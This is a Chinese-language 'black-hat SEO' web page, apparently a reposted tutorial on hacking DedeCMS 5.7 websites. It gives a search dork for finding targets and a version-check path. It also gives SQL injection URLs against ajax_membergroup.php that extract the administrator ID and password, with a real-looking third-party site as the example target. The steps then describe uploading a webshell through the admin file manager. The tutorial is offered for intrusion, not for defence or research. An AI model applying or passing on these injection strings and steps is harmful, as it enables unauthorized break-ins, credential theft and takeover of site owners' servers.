当前位置:主页 > 高级SEO技术 > [黑客技术]dedecms版本漏洞

[黑客技术]dedecms版本漏洞

很多时候我们都想学破解,渗透,入侵,可惜不知道怎么去入门,那么这篇文章教大家如何来查找织梦Dede5.7的漏洞。废话不多说,直接上干货。

织网5.7的漏洞,可任意上传~

搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc

访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~

[黑客技术]dedecms版本漏洞-黑帽Seo

查看网站的版本

code 区域

cms /data/admin/ver.txt

[黑客技术]dedecms版本漏洞-黑帽Seo

查看是否有"朋友 修改",有则存在注入

 

code 区域

/member/ajax_membergroup.php?action=post&membergroup=1

[黑客技术]dedecms版本漏洞-黑帽Seo

帐号

code 区域

http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`

[黑客技术]dedecms版本漏洞-黑帽Seo

去掉前三位和最后一位,得到管理员密码

code 区域

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`

[黑客技术]dedecms版本漏洞-黑帽Seo

扫后台,登录成功

[黑客技术]dedecms版本漏洞-黑帽Seo

后台页面

[黑客技术]dedecms版本漏洞-黑帽Seo

模块-文件管理器-文件上传 上传大马

[黑客技术]dedecms版本漏洞-黑帽Seo

登录webshell

文章来源于互联网,如有侵权请联系站长删除。
转载:[黑客技术]dedecms版本漏洞请注明出处 http://www.78320.cn

[黑客技术]dedecms版本漏洞:等您坐沙发呢!

发表评论



评论列表(条)

    
    返回首页 评论 向上